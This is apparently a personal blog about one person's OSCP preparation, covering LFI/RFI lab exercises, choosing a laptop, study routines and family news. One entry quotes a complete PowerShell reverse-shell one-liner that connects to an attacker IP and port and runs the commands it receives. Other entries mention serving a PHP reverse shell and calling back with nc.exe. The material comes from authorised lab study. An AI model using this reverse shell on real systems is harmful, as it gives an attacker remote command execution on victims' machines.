RCE using RFI attacks

Now that I have finished tackling LFI attacks, I am moving on to try to do a similar exploit, but rather than executing something from the victim machine, I will execute from my computer (the attacking machine) – hence “Remote File Inclusion” attacks, or RFI attacks.

I seem to be having some trouble with this one, and ultimately going with pausing on this and rethinking. My first thought was to serve php-reverse-shell from pentestmonkey from my machine, but it didn’t work.

I then backed up and thought to myself if the shell was working at all. So I decided to just upload the script on my victim machine and see if I could get a reverse shell. Well, my windows victim machine is super old and http cacheing wasn’t even letting me download the reverse shell to the machine over 80. I tried tftp, and nada. I finally zipped the script, and downloaded the .zip file.

Then I went ahead and unzipped on my victim machine and tried it. It would connect over netcat but then close the connection. So yeah, that’s not working. Honestly, at this point, I don’t even think that I should be downloading outside scripts to get the labs to work. So I am going to back up again, think about having nc.exe served from my machine, and execute a command to that executable. Then at least I can move on with the labs.

I do think there is value to getting the php-reverse-shell from pentestmonkey working though – it would be super valuable when I start popping boxes.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.


…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of things that they say in the exercise is that they quote Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. ūüôā

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.

15 days into to the OSCP and I am tired…

Hi everyone. I don’t think I officially started blogging about my OSCP journey. So, here, 15 days in and I am blogging while my latest PWK VM is being copied from C:/ to my NAS.

I have about 9 years of managerial cybersecurity experience under my belt, and as you can see from my earlier posts, I have been working for about 6 months getting prepped for my OSCP jump. I was working through Georgia Weidman’s Book, Penetration Testing: A Hands-On Introduction to Hacking, got frustrated at Cybrary for a hot one (some of the basic modules has flaws, not to mention my I would get kicked off the penetration testing pro track pretty much every week, and had to wait till Cybrary was back from the weekend to get sorted out). I thought about going back and doing my CE|H v10 but decided (thanks to my wife) that I should just go for the OSCP.

I was able to convince my work to flip the bill for 90 days of the lab and the materials, and whee! Here we go, into the rabbit hole. I have been scraping the web on people’s thoughts/preparation on the OSCP and shit myself in the process because this is a deep journey, and everyone is different, so I have to stop reading and just start moving.

Week 1: Got the monstrous course book, and the videos. Backed them up like three times since there is a fine for losing them and asking for them again. Worked verbatim through the videos, racking up some shell scripts and python on my PWK VM, and then realized that if I go through the book document all relevant exercises and pwn 10 machines, writing up a report, PDF it to Offensive Security, I would get 5 bonus points on my OSCP score. Some people say it’s not worth it, but I think it’s an awesome way to study and practice for the real deal, so I dropped doing the videos and started moving through the book.

Week 2: I am one slow man. I did manage to setup my PWK VM a bit better, realizing that terminator is the way to go, along with using OneNote to record my lab exercises and notes. I am three chapters out of 18 to go. I have a strange feeling that I will be asking for more lab time.

So, today I mounted an empty folder over my root folder in my PWK VM image today. I am not smart man. I can’t stress how glad I was for using OneNote online to backup my notes and exercises.  Backup, backup, backup.  The VMWare tools aren’t really working (at the moment) with the PWK VM, but after I messed everything up, I followed this chap’s thoughts on bridging a folder between the VM and the host, with the host folder backing up to the cloud. I chose OneDrive since my my OneNote online notebook for my notes and exercises were going there and the Surface Laptop I am using is so friggen integrated with OneDrive, I get that folder structure on my laptop mixed up with the simple core folders I have locally all the time. Moving forward, I see no reason not to back up my entire VM when I make changes to it.

Currently 6pm on 12/29/2018. I aim to get through a good portion of chapter 4 tomorrow. Remember, it’s an OSCP journey. I am so passionate about this stuff, and with time, I think I can rock this. I just need to be smart, and honestly, move a bit faster.

I love meditation ūüĎĀÔłŹ‚̧ԳŹūüßė

Merry Christmas interwebs! Well, one day late, but still – and keep in mind that is the Catholic Christmas, not the Orthodox Christmas, which we will celebrate with my wife’s family on January 7th, 2019. So merry in-between Christmas???

There are a few things I love, and meditation is one of them. I can’t highlight how amazing it is – and with apps like Headspace, you really can’t go wrong. There is so much importance in the need for us to appreciate the present. I think when we train our minds on being present and aware, we appreciate life and the people around us. I am currently working through headspace on their Kindness pack but there are so many different types of packs, from mindful eating to taking a walk in the park.

I am on day 11 of my OSCP and the more I read about the test, and what it involoves, the more I realize that 90 days may get me to where I need, but I have to study. So my goal is 3 hours/day weekdays, 6-8 hours/day weekends. I think if I just inviest the time and energy, it’s possible. The OSCP is becoming the de-facto standard in Pen Testing, and I really want to get it. It would be such a confidence lifter for me.

Happy Wednesday, and press on.

Finally landed on the Surface Laptop 2

Well, the Matebook¬†X Pro didn’t fair well to a dual boot with Kali and Windows.¬† ¬†I think it had something to do with the weird 3000×2000 resolution and the fact that grub couldn’t understand that to boot into an installer for Kali.¬† I tried working on different grub commands, but eh, I did so much that I couldn’t get the machine to boot back into the original install.

So I took it back to the store and decided VM only – no dual booting.¬† I mean, OSCP is set up to work within a VM, all my practice¬†books are with VMs.¬† So VM it is – and I need a good supported VM app, so Windows with VMWare Workstation was the way to go.¬† I also wanted a laptop that will last, so I put¬†up the extra cash for the new Surface Laptop 2.¬† I am happy so far.¬† I do wish it has a USB-C as the MXP did, but it wasn’t a deal breaker.¬† Back to studying!

Happy Monday!

Currently listening to Desi, waiting for my new USB stick to finish a slow format.¬† So I have been using my wife’s computer to start prepping for the OSCP, and I have to say, that was a bad idea.¬† I have a mac, but trying to create my own virtual lab in there has been rough.¬† I used VirtualBox¬†to do this, but VMWare workstation on a windows machine just seems to get the job done right.

So, my first thought was to go with a souped-up Chromebook.¬† I went ahead and got the i7 Pixelbook.¬† Nice looking machine, and yes, I think ChromeOS is nice – but I wanted to run Linux off of it.¬† So I went two different routes on this, and both didn’t work like I needed it to.

Route 1:¬† I changed my channel to the developer channel and just used the crostini linux¬†that google offered from this channel.¬† It wasn’t a full blown linux¬†like I needed.¬† So scratch that.

Route 2: I put the Pixelbook in developer mode, and ran chroots of linux.¬† After some crazy finagling, I got kali-rolling on a xfce¬†desktop.¬† But, still limited – for example, I couldn’t do any networking – this was just a virtual container running on ChromeOS.

I didn’t try wiping the OS and just installing a linux¬†on metal.¬† Mainly because I was afraid that doing that would lock me into not being able to return the machine.¬† After not being able to successfully do either of the above routes, I put the machine back on the stable channel, main mode, and powerwash.

I haven’t gotten my $ back (it’s still in the mail), but I need a machine that is not my wife’s.¬† Some googling commenced, and I settled on a Matebook¬†X Pro (MXP).¬† I think it’s the best bang for your buck.¬† I almost bought a Surface Book 2, but it was clunky, and $1K more.¬† I don’t really need a 2-in-1.¬† The only thing about the MXP¬†is the resolution is a bit wack.¬† It works, but it’s like 3000×2000 – and then you have to increase the font size.¬† So far, ok, but some of my older Vms¬†(windows 7, XP, Ubuntu) are hard to see/really small.¬† But the ports, the size, and the power of the computer I really like.¬† I am a bit concerned about the build – Chinese products sometimes don’t last as long, and I am hoping this will take me 5 years out.¬† But I hope that I am done with my OSCP at that time, and might be time for a new PC, based on what I learned.

I am going to set up a dual boot on Kali and Windows.¬† The drive is a 512MB SSD and so far, all is well, except for the heat – the computer does come with a 1 year warranty, so I am going to lean on that if something doesn’t go well.

Greetings from Cambridge.

I am writing to you from Cambridge – my sister in law is a freshman here at Harvard, and it’s parent’s weekend.¬† Here’s a pic of her and my daughter ūüôā¬† I had an opportunity to step into CS 50, which is the largest core computer science class that Harvard has to offer.¬† It was awesome.¬† The teacher was animated, clear, and descriptive.¬† ¬†I want to come to Harvard and get at CS degree now!

Here, they are introducing databases.  The one thing I love about Harvard is the inspiration it brings Рwhich leads me to my Bsides event, which was awesome.  I learned a lot from the CTF, and I need to learn more.

I got to the game late, so I didn’t understand the team’s strategy.¬† Hell,¬† I didn’t even understand the board.¬† But a few reddit¬†posts later, I think I am good to go for my next one.¬† I think I am going to play some CTFs online.

Oh, and work approved my OSCP tuition – so its on.

My first Pros Vs. Joes!

So BsidesDC is this weekend, and honestly, I am really not sure why the ham sandwich I haven’t been to the conference all these years.¬† I am really trying to focus on getting back into the technical realm, and conferences like this have some great presentations, speakers, and just interesting people – so yah, I am going.¬† It’s gonna be f&*#@ fantastic.¬† And then, just today, I got invited by @malwaremama¬†to participate in¬†@dichotomy1‘s ProsVsJoes¬†event.¬† Hell’s bells son.¬† Better firm up those whitelists and start closing down unnecessary¬†ports, it’s gonna get crazy.¬† Here’s my checklist:

For now, a bit of reading, and a good time will be had by all ūüôā